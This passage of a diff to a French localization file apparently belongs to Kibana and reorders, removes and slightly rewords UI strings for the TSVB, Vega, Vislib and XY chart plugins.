"Afficher la légende ?", "visTypeTimeseries.timeseries.optionsTab.styleLabel": "Style", "visTypeTimeseries.timeseries.optionsTab.tooltipMode": "Infobulle", - "visTypeTimeseries.timeseries.optionsTab.truncateLegendLabel": "Tronquer la légende ?", - "visTypeTimeseries.timeSeries.overrideDataViewLabel": "Écraser la vue de données ?", + "visTypeTimeseries.timeseries.optionsTab.truncateLegendLabel": "Tronquer la légende ?", + "visTypeTimeseries.timeSeries.overrideDataViewLabel": "Écraser la vue de données ?", "visTypeTimeseries.timeSeries.percentLabel": "Pourcent", "visTypeTimeseries.timeseries.positionOptions.leftLabel": "Gauche", "visTypeTimeseries.timeseries.positionOptions.rightLabel": "Droite", @@ -6746,13 +5918,12 @@ "visTypeTimeseries.timeSeries.rightLabel": "Droite", "visTypeTimeseries.timeseries.scaleOptions.logLabel": "Logarithmique", "visTypeTimeseries.timeseries.scaleOptions.normalLabel": "Normal", - "visTypeTimeseries.timeSeries.separateAxisLabel": "Axe séparé ?", + "visTypeTimeseries.timeSeries.separateAxisLabel": "Axe séparé ?", "visTypeTimeseries.timeSeries.splitColorThemeLabel": "Thème de couleurs de division", "visTypeTimeseries.timeSeries.stackedLabel": "Empilé", "visTypeTimeseries.timeSeries.stackedWithinSeriesLabel": "Empilé dans la série", "visTypeTimeseries.timeSeries.tab.metricsLabel": "Indicateurs", "visTypeTimeseries.timeSeries.tab.optionsLabel": "Options", - "visTypeTimeseries.timeSeries.templateHelpText": "par ex. {templateExample}", "visTypeTimeseries.timeSeries.templateLabel": "Modèle", "visTypeTimeseries.timeSeries.toggleSeriesEditorAriaLabel": "Basculer l'éditeur de séries", "visTypeTimeseries.timeseries.tooltipOptions.showAll": "Afficher toutes les valeurs", @@ -6777,11 +5948,10 @@ "visTypeTimeseries.topN.dataTab.dataButtonLabel": "Données", "visTypeTimeseries.topN.deleteSeriesTooltip": "Supprimer la série", "visTypeTimeseries.topN.labelPlaceholder": "Étiquette", - "visTypeTimeseries.topN.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", + "visTypeTimeseries.topN.optionsTab.backgroundColorLabel": "Couleur de l'arrière-plan :", "visTypeTimeseries.topN.optionsTab.colorRulesLabel": "Règles de couleur", "visTypeTimeseries.topN.optionsTab.dataLabel": "Données", - "visTypeTimeseries.topN.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", - "visTypeTimeseries.topN.optionsTab.itemUrlDescription": "Prend en charge les modèles de moustaches. {key} est défini sur le terme.", + "visTypeTimeseries.topN.optionsTab.ignoreGlobalFilterLabel": "Ignorer le filtre global ?", "visTypeTimeseries.topN.optionsTab.itemUrlLabel": "URL de l'élément", "visTypeTimeseries.topN.optionsTab.panelFilterLabel": "Filtre de panneau", "visTypeTimeseries.topN.optionsTab.panelOptionsButtonLabel": "Options du panneau", @@ -6795,7 +5965,6 @@ "visTypeTimeseries.units.perMillisecond": "par milliseconde", "visTypeTimeseries.units.perMinute": "par minute", "visTypeTimeseries.units.perSecond": "par seconde", - "visTypeTimeseries.unsupportedSplit.splitIsUnsupportedDescription": "Diviser par {modelType} n'est pas pris en charge.", "visTypeTimeseries.vars.variableNameAriaLabel": "Nom de la variable", "visTypeTimeseries.vars.variableNamePlaceholder": "Nom de la variable", "visTypeTimeseries.visEditorVisualization.applyChangesLabel": "Appliquer les modifications", @@ -6805,77 +5974,50 @@ "visTypeTimeseries.visEditorVisualization.changesWillBeAutomaticallyAppliedMessage": "Les modifications seront appliquées automatiquement.", "visTypeTimeseries.visEditorVisualization.dataViewMode.dismissNoticeButtonText": "Rejeter", "visTypeTimeseries.visEditorVisualization.dataViewMode.link": "Venez voir.", - "visTypeTimeseries.visEditorVisualization.dataViewMode.notificationMessage": "Bonne nouvelle ! Vous pouvez visualiser les données des vues de données Kibana (recommandé) ou des index Elasticsearch. {indexPatternModeLink}.", "visTypeTimeseries.visEditorVisualization.dataViewMode.notificationTitle": "TSVB est compatible avec les vues de données", "visTypeTimeseries.visPicker.gaugeLabel": "Jauge", "visTypeTimeseries.visPicker.metricLabel": "Indicateur", "visTypeTimeseries.visPicker.tableLabel": "Tableau", "visTypeTimeseries.visPicker.timeSeriesLabel": "Séries temporelles", "visTypeTimeseries.visPicker.topNLabel": "N premiers", - "visTypeTimeseries.wrongAggregationErrorMessage": "l'agrégation {metricType} n’est pas compatible pour la configuration de panneau existante.", "visTypeTimeseries.yesButtonLabel": "Oui", - "visTypeVega.deprecatedHistogramIntervalInfo.message": "Le champ combiné \"interval\" a été déclassé à la faveur de deux nouveaux champs explicites : \"calendar_interval\" et \"fixed_interval\". {dateHistogramDoc}", - "visTypeVega.editor.formatError": "Erreur lors du formatage des spécifications", - "visTypeVega.editor.reformatAsHJSONButtonLabel": "Reformater en HJSON", - "visTypeVega.editor.reformatAsJSONButtonLabel": "Reformater en JSON, supprimer les commentaires", - "visTypeVega.editor.vegaDocumentationLinkText": "Documentation Vega", - "visTypeVega.editor.vegaEditorOptionsButtonAriaLabel": "Options de l'éditeur Vega", - "visTypeVega.editor.vegaHelpButtonAriaLabel": "Aide Vega", - "visTypeVega.editor.vegaHelpLinkText": "Aide Kibana Vega", - "visTypeVega.editor.vegaLiteDocumentationLinkText": "Documentation Vega-Lite", + "visTypeVega.deprecatedHistogramIntervalInfo.message": "Le champ combiné \"interval\" a été déclassé à la faveur de deux nouveaux champs explicites : \"calendar_interval\" et \"fixed_interval\". {dateHistogramDoc}", "visTypeVega.emsFileParser.emsFileNameDoesNotExistErrorMessage": "{emsfile} {emsfileName} n'existe pas", "visTypeVega.emsFileParser.missingNameOfFileErrorMessage": "{dataUrlParam} avec {dataUrlParamValue} requiert le paramètre {nameParam} (nom du fichier)", "visTypeVega.esQueryParser.autointervalValueTypeErrorMessage": "{autointerval} doit être {trueValue} ou un nombre", "visTypeVega.esQueryParser.dataUrlMustNotHaveLegacyAndBodyQueryValuesAtTheSameTimeErrorMessage": "{dataUrlParam} ne doit pas avoir de {legacyContext} existant et de valeurs {bodyQueryConfigName} en même temps", "visTypeVega.esQueryParser.dataUrlMustNotHaveLegacyContextTogetherWithContextOrTimefieldErrorMessage": "{dataUrlParam} ne doit pas avoir de {legacyContext} avec {context} ou {timefield}", "visTypeVega.esQueryParser.legacyContextCanBeTrueErrorMessage": "{legacyContext} existant peut être {trueValue} (ignore le sélecteur de plage temporelle), ou il peut s'agir du nom du champ temporel, par ex. {timestampParam}", - "visTypeVega.esQueryParser.legacyUrlShouldChangeToWarningMessage": "{urlParam} existant : {legacyUrl} doit être modifié en {result}", + "visTypeVega.esQueryParser.legacyUrlShouldChangeToWarningMessage": "{urlParam} existant : {legacyUrl} doit être modifié en {result}", "visTypeVega.esQueryParser.shiftMustValueTypeErrorMessage": "{shiftParam} doit être une valeur numérique", "visTypeVega.esQueryParser.timefilterValueErrorMessage": "La propriété {timefilter} doit être définie sur {trueValue}, {minValue} ou {maxValue}", - "visTypeVega.esQueryParser.unknownUnitValueErrorMessage": "Valeur {unitParamName} inconnue. Doit être l'une des valeurs suivantes : [{unitParamValues}]", + "visTypeVega.esQueryParser.unknownUnitValueErrorMessage": "Valeur {unitParamName} inconnue. Doit être l'une des valeurs suivantes : [{unitParamValues}]", "visTypeVega.esQueryParser.unnamedRequest": "Requête sans nom #{index}", "visTypeVega.esQueryParser.urlBodyValueTypeErrorMessage": "{configName} doit être un objet", "visTypeVega.esQueryParser.urlContextAndUrlTimefieldMustNotBeUsedErrorMessage": "{urlContext} et {timefield} ne doivent pas être utilisés lorsque {queryParam} est défini", - "visTypeVega.function.help": "Visualisation Vega", - "visTypeVega.inspector.dataSetsLabel": "Ensembles de données", - "visTypeVega.inspector.dataViewer.dataSetAriaLabel": "Ensemble de données", "visTypeVega.inspector.dataViewer.gridAriaLabel": "Grille de données {name}", - "visTypeVega.inspector.errorHeading": "Vega n’a pas réussi le rendu", - "visTypeVega.inspector.signalValuesLabel": "Valeurs de signal", - "visTypeVega.inspector.signalViewer.gridAriaLabel": "Grille de données des valeurs de signal", - "visTypeVega.inspector.specLabel": "Spéc.", - "visTypeVega.inspector.specViewer.copyToClipboardLabel": "Copier dans le presse-papiers", - "visTypeVega.inspector.vegaAdapter.signal": "Signal", - "visTypeVega.inspector.vegaAdapter.value": "Valeur", - "visTypeVega.inspector.vegaDebugLabel": "Débogage Vega", - "visTypeVega.mapView.experimentalMapLayerInfo": "Cette fonctionnalité est en version d'évaluation technique et peut être modifiée ou retirée complètement dans une future version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités dans la version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.", + "visTypeVega.mapView.experimentalMapLayerInfo": "Cette fonctionnalité est en version d'évaluation technique et pourra être modifiée ou retirée complètement dans une future version. Elastic s'efforcera au maximum de corriger tout problème, mais les fonctionnalités dans la version d'évaluation technique ne sont pas soumises aux accords de niveau de service d'assistance des fonctionnalités officielles en disponibilité générale. Pour apporter des commentaires, veuillez créer une entrée dans {githubLink}.", "visTypeVega.mapView.mapStyleNotFoundWarningMessage": "{mapStyleParam} est introuvable", "visTypeVega.mapView.minZoomAndMaxZoomHaveBeenSwappedWarningMessage": "{minZoomPropertyName} et {maxZoomPropertyName} ont été permutés", "visTypeVega.mapView.resettingPropertyToMaxValueWarningMessage": "Réinitialisation de {name} sur {max}", "visTypeVega.mapView.resettingPropertyToMinValueWarningMessage": "Réinitialisation de {name} sur {min}", - "visTypeVega.type.vegaDescription": "Utilisez Vega pour créer de nouveaux types de visualisations.", - "visTypeVega.type.vegaNote": "Requiert une connaissance de la syntaxe Vega.", - "visTypeVega.type.vegaTitleInWizard": "Visualisation personnalisée", "visTypeVega.urlParser.dataUrlRequiresUrlParameterInFormErrorMessage": "{dataUrlParam} requiert un paramètre {urlParam} sous la forme \"{formLink}\"", "visTypeVega.urlParser.urlShouldHaveQuerySubObjectWarningMessage": "L'utilisation d'un {urlObject} requiert un sous-objet {subObjectName}", - "visTypeVega.vegaParser.autoSizeDoesNotAllowFalse": "{autoSizeParam} est activé ; il peut uniquement être désactivé en définissant {autoSizeParam} sur {noneParam}", + "visTypeVega.vegaParser.autoSizeDoesNotAllowFalse": "{autoSizeParam} est activé ; il peut uniquement être désactivé en définissant {autoSizeParam} sur {noneParam}", "visTypeVega.vegaParser.baseView.externalUrlsAreNotEnabledErrorMessage": "Les URL externes ne sont pas activées. Ajouter {enableExternalUrls} à {kibanaConfigFileName}", "visTypeVega.vegaParser.baseView.externalUrlServiceErrorMessage": "l'URL externe [{uri}] a été refusée par le service ExternalUrl. Vous pouvez configurer des politiques d'URL externe avec le paramètre \"{externalUrlPolicy}\" dans {kibanaConfigFileName}.", "visTypeVega.vegaParser.baseView.functionIsNotDefinedForGraphErrorMessage": "{funcName} n'est pas défini pour ce graphe", "visTypeVega.vegaParser.baseView.indexNotFoundErrorMessage": "Impossible de trouver l'index {index}", - "visTypeVega.vegaParser.baseView.timeValuesTypeErrorMessage": "Erreur lors de la définition du filtre de temps : les deux valeurs temporelles doivent être des dates relatives ou absolues. {start}, {end}", - "visTypeVega.vegaParser.baseView.unableToFindDefaultIndexErrorMessage": "Impossible de trouver l'index par défaut", + "visTypeVega.vegaParser.baseView.timeValuesTypeErrorMessage": "Erreur lors de la définition du filtre de temps : les deux valeurs temporelles doivent être des dates relatives ou absolues. {start}, {end}", "visTypeVega.vegaParser.centerOnMarkConfigValueTypeErrorMessage": "Les valeurs attendues pour {configName} sont {trueValue}, {falseValue} ou un nombre", "visTypeVega.vegaParser.dataExceedsSomeParamsUseTimesLimitErrorMessage": "Les données ne doivent pas avoir plus d'un paramètre {urlParam}, {valuesParam} et {sourceParam}", "visTypeVega.vegaParser.hostConfigIsDeprecatedWarningMessage": "{deprecatedConfigName} a été déclassé. Utilisez {newConfigName} à la place.", "visTypeVega.vegaParser.hostConfigValueTypeErrorMessage": "S'il est présent, le paramètre {configName} doit être un objet", "visTypeVega.vegaParser.inputSpecDoesNotSpecifySchemaErrorMessage": "Vos spécifications requièrent un champ {schemaParam} avec une URL valide pour\nVega (voir {vegaSchemaUrl}) ou\nVega-Lite (voir {vegaLiteSchemaUrl}).\nL'URL est uniquement un identificateur. Kibana et votre navigateur n'accéderont jamais à cette URL.", - "visTypeVega.vegaParser.invalidVegaSpecErrorMessage": "Spécification Vega non valide", "visTypeVega.vegaParser.kibanaConfigValueTypeErrorMessage": "S'il est présent, le paramètre {configName} doit être un objet", "visTypeVega.vegaParser.maxBoundsValueTypeWarningMessage": "{maxBoundsConfigName} doit être un tableau avec quatre nombres", "visTypeVega.vegaParser.notSupportedUrlTypeErrorMessage": "{urlObject} n'est pas pris en charge", - "visTypeVega.vegaParser.notValidLibraryVersionForInputSpecWarningMessage": "Les spécifications d'entrée utilisent {schemaLibrary} {schemaVersion}, mais la version actuelle de {schemaLibrary} est {libraryVersion}.", - "visTypeVega.vegaParser.notValidSchemaForInputSpec": "l'URL du \"$schema\" JSON est incorrecte. Corrigez l'URL, puis cliquez sur Mettre à jour.", + "visTypeVega.vegaParser.notValidLibraryVersionForInputSpecWarningMessage": "Les spécifications d'entrée utilisent {schemaLibrary} {schemaVersion}, mais la version actuelle de {schemaLibrary} est {libraryVersion}.", "visTypeVega.vegaParser.paddingConfigValueTypeErrorMessage": "La valeur attendue pour {configName} est un nombre", "visTypeVega.vegaParser.someKibanaConfigurationIsNoValidWarningMessage": "{configName} n'est pas valide", "visTypeVega.vegaParser.someKibanaParamValueTypeWarningMessage": "{configName} doit être une valeur booléenne", @@ -6883,33 +6025,59 @@ "visTypeVega.vegaParser.unexpectedValueForPositionConfigurationErrorMessage": "Valeur inattendue pour la configuration {configurationName}", "visTypeVega.vegaParser.unrecognizedControlsLocationValueErrorMessage": "Valeur {controlsLocationParam} non reconnue. Valeur attendue parmi [{locToDirMap}]", "visTypeVega.vegaParser.unrecognizedDirValueErrorMessage": "Valeur {dirParam} non reconnue. Valeur attendue parmi [{expectedValues}]", - "visTypeVega.vegaParser.VLCompilerShouldHaveGeneratedSingleProtectionObjectErrorMessage": "Erreur interne : le compilateur Vega-Lite aurait dû générer un objet de projection unique", "visTypeVega.vegaParser.widthAndHeightParamsAreIgnored": "Les paramètres {widthParam} et {heightParam} sont ignorés, car {autoSizeParam} est activé. Pour le désactiver, définissez {autoSizeParam} sur {noneParam}", "visTypeVega.vegaParser.widthAndHeightParamsAreRequired": "Aucun rendu n'est généré lorsque {autoSizeParam} est défini sur {noneParam} quand les spécifications {vegaLiteParam} à facette ou répétées sont utilisées. Pour y remédier, retirez {autoSizeParam} ou utilisez {vegaParam}.", + "visTypeVega.editor.formatError": "Erreur lors du formatage des spécifications", + "visTypeVega.editor.reformatAsHJSONButtonLabel": "Reformater en HJSON", + "visTypeVega.editor.reformatAsJSONButtonLabel": "Reformater en JSON, supprimer les commentaires", + "visTypeVega.editor.vegaDocumentationLinkText": "Documentation Vega", + "visTypeVega.editor.vegaEditorOptionsButtonAriaLabel": "Options de l'éditeur Vega", + "visTypeVega.editor.vegaHelpButtonAriaLabel": "Aide Vega", + "visTypeVega.editor.vegaHelpLinkText": "Aide Kibana Vega", + "visTypeVega.editor.vegaLiteDocumentationLinkText": "Documentation Vega-Lite", + "visTypeVega.function.help": "Visualisation Vega", + "visTypeVega.inspector.dataSetsLabel": "Ensembles de données", + "visTypeVega.inspector.dataViewer.dataSetAriaLabel": "Ensemble de données", + "visTypeVega.inspector.errorHeading": "Vega n’a pas réussi le rendu", + "visTypeVega.inspector.signalValuesLabel": "Valeurs de signal", + "visTypeVega.inspector.signalViewer.gridAriaLabel": "Grille de données des valeurs de signal", + "visTypeVega.inspector.specLabel": "Spéc.", + "visTypeVega.inspector.specViewer.copyToClipboardLabel": "Copier dans le presse-papiers", + "visTypeVega.inspector.vegaAdapter.signal": "Signal", + "visTypeVega.inspector.vegaAdapter.value": "Valeur", + "visTypeVega.inspector.vegaDebugLabel": "Débogage Vega", + "visTypeVega.type.vegaDescription": "Utilisez Vega pour créer de nouveaux types de visualisations.", + "visTypeVega.type.vegaNote": "Requiert une connaissance de la syntaxe Vega.", + "visTypeVega.type.vegaTitleInWizard": "Visualisation personnalisée", + "visTypeVega.vegaParser.baseView.unableToFindDefaultIndexErrorMessage": "Impossible de trouver l'index par défaut", + "visTypeVega.vegaParser.invalidVegaSpecErrorMessage": "Spécification Vega non valide", + "visTypeVega.vegaParser.notValidSchemaForInputSpec": "l'URL du \"$schema\" JSON est incorrecte. Corrigez l'URL, puis cliquez sur Mettre à jour.", + "visTypeVega.vegaParser.VLCompilerShouldHaveGeneratedSingleProtectionObjectErrorMessage": "Erreur interne : le compilateur Vega-Lite aurait dû générer un objet de projection unique", "visTypeVega.visualization.renderErrorTitle": "Erreur Vega", "visTypeVega.visualization.setMapViewErrorMessage": "Paramètres setMapView() inattendus. Il est possible de l'appeler avec une zone de délimitation setMapView([[longitude1,latitude1],[longitude2,latitude2]]), ou il peut s'agir du point central setMapView([longitude, latitude], optional_zoom), ou encore il est possible de l'utiliser comme setMapView(latitude, longitude, optional_zoom)", "visTypeVega.visualization.unableToRenderWithoutDataWarningMessage": "Impossible de générer un rendu sans données", + "visTypeVislib.vislib.heatmap.maxBucketsText": "Trop de séries sont définies ({nr}). La valeur de configuration maximale est {max}.", + "visTypeVislib.vislib.legend.filterForValueButtonAriaLabel": "Filtrer pour la valeur {legendDataLabel}", + "visTypeVislib.vislib.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", + "visTypeVislib.vislib.legend.filterOutValueButtonAriaLabel": "Filtrer la valeur {legendDataLabel}", + "visTypeVislib.vislib.legend.toggleOptionsButtonAriaLabel": "{legendDataLabel}, options de basculement", "visTypeVislib.advancedSettings.visualization.heatmap.maxBucketsText": "Nombre maximal de groupes pouvant être renvoyés par une source de données unique. Un nombre plus élevé pourra impacter négativement les performances de rendu du navigateur", "visTypeVislib.advancedSettings.visualization.heatmap.maxBucketsTitle": "Nombre maximal de groupes pour la carte thermique", "visTypeVislib.aggResponse.allDocsTitle": "Tous les docs", "visTypeVislib.functions.pie.help": "Visualisation du camembert", "visTypeVislib.functions.vislib.help": "Visualisation Vislib", "visTypeVislib.vislib.errors.noResultsFoundTitle": "Résultat introuvable", - "visTypeVislib.vislib.heatmap.maxBucketsText": "Trop de séries sont définies ({nr}). La valeur de configuration maximale est {max}.", - "visTypeVislib.vislib.legend.filterForValueButtonAriaLabel": "Filtrer pour la valeur {legendDataLabel}", - "visTypeVislib.vislib.legend.filterOptionsLegend": "{legendDataLabel}, options de filtre", - "visTypeVislib.vislib.legend.filterOutValueButtonAriaLabel": "Filtrer la valeur {legendDataLabel}", "visTypeVislib.vislib.legend.loadingLabel": "chargement…", "visTypeVislib.vislib.legend.toggleLegendButtonAriaLabel": "Basculer la légende", - "visTypeVislib.vislib.legend.toggleLegendButtonTitle": "Basculer la légende", - "visTypeVislib.vislib.legend.toggleOptionsButtonAriaLabel": "{legendDataLabel}, options de basculement", + "visTypeVislib.vislib.legend.toggleLegendButtonTitle": "Afficher/Masquer la légende", "visTypeVislib.vislib.tooltip.fieldLabel": "champ", "visTypeVislib.vislib.tooltip.valueLabel": "valeur", - "visTypeXy.aggResponse.allDocsTitle": "Tous les docs", + "visTypeXy.controls.pointSeries.seriesAccordionAriaLabel": "Basculer les options {agg}", + "visTypeXy.controls.pointSeries.valueAxes.toggleOptionsAriaLabel": "Basculer les options {axisName}", "visTypeXy.area.areaDescription": "Mettez en avant les données entre un axe et une ligne.", "visTypeXy.area.areaTitle": "Aire", "visTypeXy.area.groupTitle": "Diviser la série", - "visTypeXy.area.metricsTitle": "Axe Y", + "visTypeXy.area.metricsTitle": "Axe Y", "visTypeXy.area.radiusTitle": "Taille du point", "visTypeXy.area.segmentTitle": "Axe X", "visTypeXy.area.splitTitle": "Diviser le graphique", @@ -6937,7 +6105,7 @@ "visTypeXy.controls.pointSeries.categoryAxis.xAxisTitle": "Axe X", "visTypeXy.controls.pointSeries.gridAxis.dontShowLabel": "Ne pas afficher", "visTypeXy.controls.pointSeries.gridAxis.gridText": "Grille", - "visTypeXy.controls.pointSeries.gridAxis.xAxisLinesLabel": "Afficher les lignes de l'axe X", + "visTypeXy.controls.pointSeries.gridAxis.xAxisLinesLabel": "Afficher les lignes de l'axe X", "visTypeXy.controls.pointSeries.gridAxis.yAxisLinesLabel": "Lignes de l'axe Y", "visTypeXy.controls.pointSeries.series.chartTypeLabel": "Type de graphique", "visTypeXy.controls.pointSeries.series.circlesRadius": "Taille des points", @@ -6949,25 +6117,23 @@ "visTypeXy.controls.pointSeries.series.showDotsLabel": "Afficher les points", "visTypeXy.controls.pointSeries.series.showLineLabel": "Afficher la ligne", "visTypeXy.controls.pointSeries.series.valueAxisLabel": "Axe des valeurs", - "visTypeXy.controls.pointSeries.seriesAccordionAriaLabel": "Basculer les options {agg}", "visTypeXy.controls.pointSeries.valueAxes.addButtonTooltip": "Ajouter l'axe Y", "visTypeXy.controls.pointSeries.valueAxes.customExtentsLabel": "Extensions personnalisées", "visTypeXy.controls.pointSeries.valueAxes.maxLabel": "Max", "visTypeXy.controls.pointSeries.valueAxes.minErrorMessage": "Min doit être inférieur à Max.", "visTypeXy.controls.pointSeries.valueAxes.minLabel": "Min", - "visTypeXy.controls.pointSeries.valueAxes.minNeededScaleText": "Min doit être supérieur à 0 lorsqu'une échelle logarithmique est sélectionnée.", + "visTypeXy.controls.pointSeries.valueAxes.minNeededScaleText": "Min doit être supérieur à 0 lorsqu'une échelle logarithmique est sélectionnée.", "visTypeXy.controls.pointSeries.valueAxes.modeLabel": "Mode", "visTypeXy.controls.pointSeries.valueAxes.positionLabel": "Position", "visTypeXy.controls.pointSeries.valueAxes.removeButtonTooltip": "Retirer l'axe Y", "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBounds.boundsMargin": "Marge des limites", - "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBounds.minNeededBoundsMargin": "La marge des limites doit être supérieure ou égale à 0.", + "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBounds.minNeededBoundsMargin": "La marge des limites doit être supérieure ou égale à 0.", "visTypeXy.controls.pointSeries.valueAxes.scaleToDataBoundsLabel": "Scaler sur les limites de données", "visTypeXy.controls.pointSeries.valueAxes.scaleTypeLabel": "Type d'échelle", "visTypeXy.controls.pointSeries.valueAxes.setAxisExtentsLabel": "Définir la portée de l'axe", "visTypeXy.controls.pointSeries.valueAxes.showLabel": "Afficher les lignes et étiquettes de l'axe", "visTypeXy.controls.pointSeries.valueAxes.titleLabel": "Titre", "visTypeXy.controls.pointSeries.valueAxes.toggleCustomExtendsAriaLabel": "Basculer la portée personnalisée", - "visTypeXy.controls.pointSeries.valueAxes.toggleOptionsAriaLabel": "Basculer les options {axisName}", "visTypeXy.controls.pointSeries.valueAxes.yAxisTitle": "Axes Y", "visTypeXy.controls.truncateLabel": "Tronquer", "visTypeXy.editors.elasticChartsOptions.detailedTooltip.label": "Afficher l'infobulle détaillée", @@ -6989,113 +6155,23 @@ "visTypeXy.fittingFunctionsTitle.lookahead": "Suivante (remplit les blancs avec la valeur suivante)", "visTypeXy.fittingFunctionsTitle.none": "Masquer (ne remplit pas les blancs)", "visTypeXy.fittingFunctionsTitle.zero": "Zéro (remplit les blancs avec des zéros)", - "visTypeXy.function.adimension.bucket": "Groupe", - "visTypeXy.function.adimension.dotSize": "Taille du point", - "visTypeXy.function.args.addLegend.help": "Afficher la légende du graphique", - "visTypeXy.function.args.addTimeMarker.help": "Afficher le repère de temps", - "visTypeXy.function.args.addTooltip.help": "Afficher l'infobulle au survol", - "visTypeXy.function.args.args.chartType.help": "Type de graphique. Peut être linéaire, en aires ou histogramme", - "visTypeXy.function.args.args.legendSize.help": "Spécifie la taille de la légende.", - "visTypeXy.function.args.args.maxLegendLines.help": "Définit le nombre maximum de lignes par élément de légende", - "visTypeXy.function.args.ariaLabel.help": "Spécifie l'attribut aria-label du graphique xy", - "visTypeXy.function.args.categoryAxes.help": "Configuration de l'axe de catégorie", - "visTypeXy.function.args.detailedTooltip.help": "Afficher l'infobulle détaillée", - "visTypeXy.function.args.fillOpacity.help": "Définit l'opacité du remplissage du graphique en aires", - "visTypeXy.function.args.fittingFunction.help": "Nom de la fonction d'adaptation", - "visTypeXy.function.args.gridCategoryLines.help": "Afficher les lignes de catégories de la grille dans le graphique", - "visTypeXy.function.args.gridValueAxis.help": "Nom de l'axe des valeurs pour lequel la grille est affichée", - "visTypeXy.function.args.isVislibVis.help": "Indicateur des anciennes visualisations vislib. Utilisé pour la rétro-compatibilité, notamment pour les couleurs", - "visTypeXy.function.args.labels.help": "Configuration des étiquettes du graphique", - "visTypeXy.function.args.legendPosition.help": "Positionner la légende en haut, en bas, à gauche ou à droite du graphique", - "visTypeXy.function.args.orderBucketsBySum.help": "Classer les groupes par somme", - "visTypeXy.function.args.palette.help": "Définit le nom de la palette du graphique", - "visTypeXy.function.args.radiusRatio.help": "Rapport de taille des points", - "visTypeXy.function.args.seriesDimension.help": "Configuration de la dimension de la série", - "visTypeXy.function.args.seriesParams.help": "Configuration des paramètres de la série", - "visTypeXy.function.args.splitColumnDimension.help": "Configuration de la dimension Diviser par colonne", - "visTypeXy.function.args.splitRowDimension.help": "Configuration de la dimension Diviser par ligne", - "visTypeXy.function.args.thresholdLine.help": "Configuration de la ligne de seuil", - "visTypeXy.function.args.times.help": "Configuration du repère de temps", - "visTypeXy.function.args.truncateLegend.help": "Détermine si la légende sera tronquée ou non", - "visTypeXy.function.args.valueAxes.help": "Configuration de l'axe des valeurs", - "visTypeXy.function.args.widthDimension.help": "Configuration de la dimension en largeur", - "visTypeXy.function.args.xDimension.help": "Configuration de la dimension de l'axe X", - "visTypeXy.function.args.yDimension.help": "Configuration de la dimension de l'axe Y", - "visTypeXy.function.args.zDimension.help": "Configuration de la dimension de l'axe Z", - "visTypeXy.function.categoryAxis.help": "Génère l'objet axe de catégorie", - "visTypeXy.function.categoryAxis.id.help": "ID de l'axe de catégorie", - "visTypeXy.function.categoryAxis.labels.help": "Configuration de l'étiquette de l'axe", - "visTypeXy.function.categoryAxis.position.help": "Position de l'axe de catégorie", - "visTypeXy.function.categoryAxis.scale.help": "Configuration de l'échelle", - "visTypeXy.function.categoryAxis.show.help": "Afficher l'axe de catégorie", - "visTypeXy.function.categoryAxis.title.help": "Titre de l'axe de catégorie", - "visTypeXy.function.categoryAxis.type.help": "Type de l'axe de catégorie. Peut être une catégorie ou une valeur", - "visTypeXy.function.dimension.metric": "Indicateur", - "visTypeXy.function.dimension.splitcolumn": "Division de colonne", - "visTypeXy.function.dimension.splitrow": "Division de ligne", - "visTypeXy.function.label.color.help": "Couleur de l'étiquette", - "visTypeXy.function.label.filter.help": "Masque les étiquettes qui se chevauchent et les éléments en double sur l'axe", - "visTypeXy.function.label.help": "Génère l'objet étiquette", - "visTypeXy.function.label.overwriteColor.help": "Écraser la couleur", - "visTypeXy.function.label.rotate.help": "Faire pivoter l'angle", - "visTypeXy.function.label.show.help": "Afficher l'étiquette", - "visTypeXy.function.label.truncate.help": "Nombre de symboles avant troncature", - "visTypeXy.function.scale.boundsMargin.help": "Marge des limites", - "visTypeXy.function.scale.defaultYExtents.help": "Indicateur qui permet de scaler sur les limites de données", - "visTypeXy.function.scale.help": "Génère l'objet échelle", - "visTypeXy.function.scale.max.help": "Valeur max", - "visTypeXy.function.scale.min.help": "Valeur min", - "visTypeXy.function.scale.mode.help": "Mode échelle. Peut être normal, pourcentage, ondulé ou silhouette", - "visTypeXy.function.scale.setYExtents.help": "Indicateur qui permet de définir votre propre portée", - "visTypeXy.function.scale.type.help": "Type d'échelle. Peut être linéaire, logarithmique ou racine carrée", - "visTypeXy.function.seriesParam.circlesRadius.help": "Définit la taille des cercles (rayon)", - "visTypeXy.function.seriesParam.drawLinesBetweenPoints.help": "Trace des lignes entre des points", - "visTypeXy.function.seriesparam.help": "Génère un objet paramètres de la série", - "visTypeXy.function.seriesParam.id.help": "ID des paramètres de la série", - "visTypeXy.function.seriesParam.interpolate.help": "Mode d'interpolation. Peut être linéaire, cardinal ou palier suivant", - "visTypeXy.function.seriesParam.label.help": "Nom des paramètres de la série", - "visTypeXy.function.seriesParam.lineWidth.help": "Largeur de ligne", - "visTypeXy.function.seriesParam.mode.help": "Mode graphique. Peut être empilé ou pourcentage", - "visTypeXy.function.seriesParam.show.help": "Afficher les paramètres", - "visTypeXy.function.seriesParam.showCircles.help": "Afficher les cercles", - "visTypeXy.function.seriesParam.type.help": "Type de graphique. Peut être linéaire, en aires ou histogramme", - "visTypeXy.function.seriesParam.valueAxis.help": "Nom de l'axe des valeurs", - "visTypeXy.function.thresholdLine.color.help": "Couleur de la ligne de seuil", - "visTypeXy.function.thresholdLine.help": "Génère un objet ligne de seuil", - "visTypeXy.function.thresholdLine.show.help": "Afficher la ligne de seuil", - "visTypeXy.function.thresholdLine.style.help": "Style de la ligne de seuil. Peut être pleine, en tirets ou en point-tiret", - "visTypeXy.function.thresholdLine.value.help": "Valeur seuil", - "visTypeXy.function.thresholdLine.width.help": "Largeur de la ligne de seuil", - "visTypeXy.function.timeMarker.class.help": "Nom de classe Css", - "visTypeXy.function.timeMarker.color.help": "Couleur du repère de temps", - "visTypeXy.function.timemarker.help": "Génère un objet repère de temps", - "visTypeXy.function.timeMarker.opacity.help": "Opacité du repère de temps", - "visTypeXy.function.timeMarker.time.help": "Heure exacte", - "visTypeXy.function.timeMarker.width.help": "Largeur du repère de temps", - "visTypeXy.function.valueAxis.axisParams.help": "Paramètres de l'axe des valeurs", - "visTypeXy.function.valueaxis.help": "Génère l'objet axe des valeurs", - 